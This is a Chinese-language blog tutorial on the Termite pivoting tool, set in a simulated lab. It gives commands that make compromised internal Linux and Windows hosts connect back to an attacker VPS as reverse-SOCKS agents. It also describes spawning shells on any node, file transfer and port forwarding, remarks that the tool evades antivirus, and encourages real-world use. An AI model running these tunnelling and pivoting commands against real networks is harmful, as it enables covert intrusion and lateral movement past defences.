APT404-不作恶

在路上,一直在路上!

灵活击穿目标多级内网纵深 [ Termite ]

0x01 关于termite [ Earthworm的升级版 ],程序地址, http://rootkiter.com/Termite/

1
2
3
一款极度小巧灵活的跳板机,有别于传统socks代理,它对于复杂内网环境下的渗透适用性更强,操作也极为简便
废话不多说,大家可自行在实战中多多体会,工具本身其实并无好坏,大部分还在乎用工具的人,退一万步来讲,即使工具再好,也顶不住别人用的烂 ^_^
在此也非常感谢 rootkiter 的无私贡献,真心希望圈子能多一些这样少说话多做事的人 ^_^

0x02 程序分为两部分,admin[为控制端]agent[为代理端节点],admin和agent所有选项用途均一致

1
2
3
-l 指定本地socks端口,等待远程连
-c 指定远程socks机器ip
-p 指定远程socks机器端口

0x03 此次模拟环境如下:

1
2
3
4
lnmp01	  	假设为我们自己的vps 	其公网ip为: 192.168.3.30
MidLAMP 目标内网的linux机器 其内网ip为: 192.168.32.192
win2008r2cn 目标内网的win机器 其内网ip为: 192.168.32.134
win7cn 入侵者本地内网机器 其内网ip为: 192.168.32.168 [因为这里用虚拟机模拟的,所以内网段和目标一样]

0x04 要实现的最终目的

1
通过lnmp01这台机器灵活穿梭于目标内网...

0x05 首先,在lnmp01机器上执行如下语句,语句成功执行后会返回一个id号,主要用来标识当前是哪一个agent,后期我们可以很方便的通过这个id号,灵活切换agent,本地的这个端口其实就是socks代理端口,也就是说,实战中我们可以把目标内网中的所有机器都弹到这一台指定的vps上

1
# ./agent_Linux32 -l 1235 &

0x06 此时,回到目标内网的MidLAMP机器上执行,下面的意思,说的通俗点其实就是建立反向socks

1
# ./agent_Linux32 -c 192.168.3.30 -p 1235 &

0x07 再此回到目标内网的win机器上执行

1
# agent_Win32.exe -c 192.168.3.30 -p 1235

0x08 在本地win7cn上用admin端连接lnmp01机器上刚刚监听的端口,连接成功后会自动进入termite的内置终端,在终端中执行help即可看到所有选项用途,show一下就可清晰地看到当前agent的地图分布,比较简单,这里就不多啰嗦了

0x09 尝试在termite内置终端中切换到不同的agent节点,执行各种任务,如,最基本的文件上传下载[ 实战中文件尽量不要过大,另外,上传下载时务必注意下自己当前的节点位置 ],任意节点弹shell,socks级联,端口转发等…关于工具的基础用法就暂时先到这里了,还是那句话,大家可自行在实战中自行体会发掘



小结:
    总体来讲,程序让我觉得最赞的地方,还是agent节点随意切换,因为这样我们就可以非常灵活地穿透目标的多级内网纵深,也就是说,我们可以随意地goto到agent地图中的任意一个节点执行socks,说到这里,想必有经验的朋友,也差不多已经理解了,另外,程序本身的异常处理暂时做的还不太到位,免杀暂时还行,至于程序内部代码实现,本人也暂时还在学习中,不得不说,这确实是个非常不错的网络编程学习样本,没完,待续…